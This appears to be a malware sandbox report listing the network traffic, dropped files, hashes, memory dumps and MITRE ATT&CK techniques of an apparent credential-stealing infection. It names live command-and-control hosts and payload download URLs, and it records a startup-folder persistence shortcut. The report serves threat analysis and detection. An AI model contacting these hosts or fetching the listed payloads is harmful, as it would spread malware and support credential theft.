User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 816853
Host: drawzhotdog.shop

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=kvvedh4008m310vmvftcaavom7; expires=Sun, 19 Jan 2025 08:52:00 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scIbNX7fugyyXTPMdT7sQiSCgqyQImZ5lbyCregp05%2FJets8IrLNHyDHyF5MUnk%2BSSxxkYa7fGXDFL%2B%2F7hDpzm%2BIYyRVbx5BRs8iKFtGlnISwX5AaeKMWR2WH2c3Z%2BfuqB%2F%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be9712f87d1fb-LHR
POST

https://5.75.211.162/

RegAsm.exe

Remote address:

5.75.211.162:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 4809
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://drawzhotdog.shop/api

RegAsm.exe

Remote address:

172.67.162.108:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1326
Host: drawzhotdog.shop

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=hm4fqutp5fgmfaeu0d5q2givv8; expires=Sun, 19 Jan 2025 08:52:00 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yp8Z8t7cdreDq9kOEPDuNy5T%2FguIWUK4n0pZWR4t0zxXo4IsVSixGiY7u36OuKSH10rjMuvnhlt%2BUDLBpjyrDiYNt91zlcQX8ihmhejoY1bMnuFy%2BjALOwpmMNcYnMBr5psx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be9776efd2294-CDG
GET

https://5.75.211.162/sqlp.dll

RegAsm.exe

Remote address:

5.75.211.162:443

Request

GET /sqlp.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:22 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: keep-alive
Last-Modified: Wednesday, 25-Sep-2024 15:05:22 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
POST

https://5.75.211.162/

RegAsm.exe

Remote address:

5.75.211.162:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDAEBGCAAECAKFHIIJDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://drawzhotdog.shop/api

RegAsm.exe

Remote address:

172.67.162.108:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 395218
Host: drawzhotdog.shop

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=f6dv2vtha33j1hefict1g95t0v; expires=Sun, 19 Jan 2025 08:52:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TqtWo2KCXXuPuX%2FmottZnJlIHgo9thKB45TfVxVftJtiJFnkbsVybVDC%2FwMxIvs1%2BbssvhBVFw5IvSOKHFNvQ2q7%2FGIKlZCwPvPUoj2bq%2BaQT2x7p3o2AAyhMpAKy%2BcrfTf5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be9826e943634-MAN
POST

https://drawzhotdog.shop/api

RegAsm.exe

Remote address:

172.67.162.108:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 77
Host: drawzhotdog.shop

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ulpmosjdbv9d552rjlavimmltt; expires=Sun, 19 Jan 2025 08:52:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x0yDHyoV2qhORdtUKvmS8kyUVv9l41ykvfwclg%2BlCG6gl3TuRYDu6ZzVtWom5SaUvFuEn998fR%2BDO%2BC0L7DntGnQZ%2BBURv22pXu3BIRvlPV8QysKaMmskL6wGYfcyg2yCOAM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be989887db11c-MAN
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

92.12.20.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.12.20.2.in-addr.arpa

IN PTR

Response

92.12.20.2.in-addr.arpa

IN PTR

a2-20-12-92deploystaticakamaitechnologiescom
DNS

83.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.210.23.2.in-addr.arpa

IN PTR

Response

83.210.23.2.in-addr.arpa

IN PTR

a2-23-210-83deploystaticakamaitechnologiescom
DNS

11.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.227.111.52.in-addr.arpa

IN PTR

Response
DNS

89.65.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

89.65.42.20.in-addr.arpa

IN PTR

Response

46.8.231.109:80

http://46.8.231.109/c4754d4f680ead72.php

http

RegAsm.exe

193.8kB
5.4MB
3913
3900

HTTP Request

GET http://46.8.231.109/

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

GET http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll

HTTP Response

200

HTTP Request

GET http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll

HTTP Response

200

HTTP Request

GET http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://46.8.231.109/1309cdeb8f4c8736/nss3.dll

HTTP Response

200

HTTP Request

GET http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll

HTTP Response

200

HTTP Request

GET http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200
147.45.44.104:80

http://147.45.44.104/prog/66f424e80b9cc_idsmds.exe

http

RegAsm.exe

28.7kB
841.9kB
612
606

HTTP Request

GET http://147.45.44.104/prog/66f42472a1351_vfdsgfsda.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/prog/66f4247d51812_lfdsjna.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/prog/66f424e80b9cc_idsmds.exe

HTTP Response

200
23.214.143.155:443

https://steamcommunity.com/profiles/76561199780418869

tls, http

RegAsm.exe

2.2kB
42.3kB
38
36

HTTP Request

GET https://steamcommunity.com/profiles/76561199780418869

HTTP Response

200
172.67.162.108:443

https://drawzhotdog.shop/api

tls, http

RegAsm.exe

15.7kB
24.7kB
34
39

HTTP Request

POST https://drawzhotdog.shop/api

HTTP Response

200

HTTP Request

POST https://drawzhotdog.shop/api

HTTP Response

200

HTTP Request

POST https://drawzhotdog.shop/api

HTTP Response

200
5.75.211.162:443

https://5.75.211.162/

tls, http

RegAsm.exe

959 B
2.7kB
11
8

HTTP Request

GET https://5.75.211.162/

HTTP Response

200
104.21.54.163:443

https://yalubluseks.eu/get_file.php

tls, http

MFDBG.exe

1.8kB
5.8kB
17
17

HTTP Request

POST https://yalubluseks.eu/get_update.php

HTTP Response

200

HTTP Request

POST https://yalubluseks.eu/receive.php

HTTP Response

200

HTTP Request

POST https://yalubluseks.eu/get_file.php

HTTP Response

200
104.26.13.205:80

http://api.ipify.org/

http

MFDBG.exe

464 B
710 B
8
6

HTTP Request

GET http://api.ipify.org/

HTTP Response

200

HTTP Request

GET http://api.ipify.org/

HTTP Response

200
5.75.211.162:443

https://5.75.211.162/

tls, http

RegAsm.exe

1.4kB
622 B
9
6

HTTP Request

POST https://5.75.211.162/

HTTP Response

200
5.75.211.162:443

https://5.75.211.162/

tls, http

RegAsm.exe

1.5kB
2.2kB
10
7

HTTP Request

POST https://5.75.211.162/

HTTP Response

200
172.67.162.108:443

https://drawzhotdog.shop/api

tls, http

RegAsm.exe

11.1kB
4.7kB
17
13

HTTP Request

POST https://drawzhotdog.shop/api

HTTP Response

200
5.75.211.162:443

https://5.75.211.162/

tls, http

RegAsm.exe

1.6kB
6.4kB
13
10

HTTP Request

POST https://5.75.211.162/

HTTP Response

200
172.67.162.108:443

https://drawzhotdog.shop/api

tls, http

RegAsm.exe

19.8kB
4.7kB
23
13

HTTP Request

POST https://drawzhotdog.shop/api

HTTP Response

200
5.75.211.162:443

https://5.75.211.162/

tls, http

RegAsm.exe

1.4kB
672 B
9
6

HTTP Request

POST https://5.75.211.162/

HTTP Response

200
172.67.162.108:443

https://drawzhotdog.shop/api

tls, http

RegAsm.exe

902.2kB
13.4kB
655
212

HTTP Request

POST https://drawzhotdog.shop/api

HTTP Response

200
5.75.211.162:443

https://5.75.211.162/

tls, http

RegAsm.exe

6.1kB
565 B
13
6

HTTP Request

POST https://5.75.211.162/

HTTP Response

200
172.67.162.108:443

https://drawzhotdog.shop/api

tls, http

RegAsm.exe

2.4kB
4.6kB
10
10

HTTP Request

POST https://drawzhotdog.shop/api

HTTP Response

200
5.75.211.162:443

https://5.75.211.162/sqlp.dll

tls, http

RegAsm.exe

109.1kB
2.6MB
1855
1851

HTTP Request

GET https://5.75.211.162/sqlp.dll

HTTP Response

200
5.75.211.162:443

https://5.75.211.162/

tls, http

RegAsm.exe

1.5kB
528 B
8
5

HTTP Request

POST https://5.75.211.162/

HTTP Response

200
172.67.162.108:443

https://drawzhotdog.shop/api

tls, http

RegAsm.exe

438.0kB
7.7kB
322
84

HTTP Request

POST https://drawzhotdog.shop/api

HTTP Response

200
172.67.162.108:443

https://drawzhotdog.shop/api

tls, http

RegAsm.exe

1.1kB
4.6kB
9
9

HTTP Request

POST https://drawzhotdog.shop/api

HTTP Response

200

8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

4.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

4.159.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

109.231.8.46.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

109.231.8.46.in-addr.arpa
8.8.8.8:53

104.44.45.147.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

104.44.45.147.in-addr.arpa
8.8.8.8:53

steamcommunity.com

dns

RegAsm.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.214.143.155
8.8.8.8:53

155.143.214.23.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

155.143.214.23.in-addr.arpa
8.8.8.8:53

drawzhotdog.shop

dns

RegAsm.exe

62 B
94 B
1
1

DNS Request

drawzhotdog.shop

DNS Response

172.67.162.108

104.21.58.182
8.8.8.8:53

yalubluseks.eu

dns

MFDBG.exe

60 B
92 B
1
1

DNS Request

yalubluseks.eu

DNS Response

104.21.54.163

172.67.140.92
8.8.8.8:53

108.162.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

108.162.67.172.in-addr.arpa
8.8.8.8:53

api.ipify.org

dns

MFDBG.exe

59 B
107 B
1
1

DNS Request

api.ipify.org

DNS Response

104.26.13.205

172.67.74.152

104.26.12.205
8.8.8.8:53

162.211.75.5.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

162.211.75.5.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

163.54.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

163.54.21.104.in-addr.arpa
8.8.8.8:53

205.13.26.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

205.13.26.104.in-addr.arpa
8.8.8.8:53

183.59.114.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

183.59.114.20.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

92.12.20.2.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

92.12.20.2.in-addr.arpa
8.8.8.8:53

83.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

83.210.23.2.in-addr.arpa
8.8.8.8:53

11.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

11.227.111.52.in-addr.arpa
8.8.8.8:53

89.65.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

89.65.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\AdminBGDAAKJJDA.exe

Filesize
25KB

MD5
168087c84c5ff3664e5e2f4eec18d7dd

SHA1
639e9e87103f576617ed08c50910ca92fe5c8c5b

SHA256
2a7cdb79045658b9c02ebbb159e5b3680d7d6d832dbd757572f7d202c3fa935d

SHA512
89491261e1234f917964566def4b1a50505ba4c2eb90d14c19e2130d78fe65cd61c4bba685909109c7088b35e7fd48f6311ace7a0dd8c703a6d1b1d23d1a54bb

Download Submit
C:\Users\AdminFCFIJEBFCG.exe

Filesize
403KB

MD5
c7f95fc671d7bf1bec293e9500577bcf

SHA1
5366030099354e76ab5f8b8df4b2e226a29679ef

SHA256
d1bd0c0a32f154e4a9c6eca1eafee762ccea17a390706025b63e657f0305f432

SHA512
82b932b03c091cf27c4671ae2bf14a35b4c9a80d0eca01204cc67b85ff215468d2de2db6f2950df9a86c165fbbe2156bb5314e8fcf841b7439badfa122eec99f

Download Submit
C:\Users\AdminIIIEBAAFBF.exe

Filesize
368KB

MD5
0cee1d66332dec523210f62e479284b9

SHA1
33f950916e13a6ec654c52160ee47e88c64a5724

SHA256
0a6a258bfdb9b1947f2945b44e274ff3f06a7c5c733ff83c2a71c5f911fa9cc0

SHA512
603aa4834c6d3a9f3b6b1629eeb2108cecfd7192110f0cf948f2971957a9231ad9d405d8424e3a41b32a8ff415d8f84e55afdec38bf996703093084162d11972

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFDBG_5e0cc795f9d345bab8de5d30fb95daec.lnk

Filesize
1KB

MD5
0b8d76d2eb180a09eae8d2bea925272a

SHA1
c4e728bf3c71dd5caf7ee92d0e2a9406434c9ac0

SHA256
8b87d8655c52402a154327ca93dda5004d42ecd9500a93f303ab1b7d71371ddc

SHA512
bfb9b9da311c6d0b2c44e8ea105dd68d41e327c6b2ca652002dc57dc945e996866f05e022ae8055e8fbf4d6705c40ed05d528dfa0da839e9d04c86fd97e9eb9d

Download Submit
memory/884-8-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/884-9-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/884-7-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/884-3-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/884-108-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/1016-88-0x0000000072E6E000-0x0000000072E6F000-memory.dmp

Filesize
4KB

Download
memory/1016-87-0x0000000000050000-0x00000000000B8000-memory.dmp

Filesize
416KB

Download
memory/2184-5-0x0000000075000000-0x00000000757B0000-memory.dmp

Filesize
7.7MB

Download
memory/2184-0-0x000000007500E000-0x000000007500F000-memory.dmp

Filesize
4KB

Download
memory/2184-1-0x0000000000B50000-0x0000000000BA6000-memory.dmp

Filesize
344KB

Download
memory/2184-155-0x0000000075000000-0x00000000757B0000-memory.dmp

Filesize
7.7MB

Download
memory/2240-147-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2240-141-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2240-145-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2344-102-0x0000000000D30000-0x0000000000D90000-memory.dmp

Filesize
384KB

Download
memory/4140-101-0x0000000000120000-0x000000000012C000-memory.dmp

Filesize
48KB

Download
memory/5084-120-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/5084-117-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/5084-121-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/5084-402-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/5084-450-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/5084-503-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/5084-489-0x00000000228A0000-0x0000000022AFF000-memory.dmp

Filesize
2.4MB

Download
memory/5084-547-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response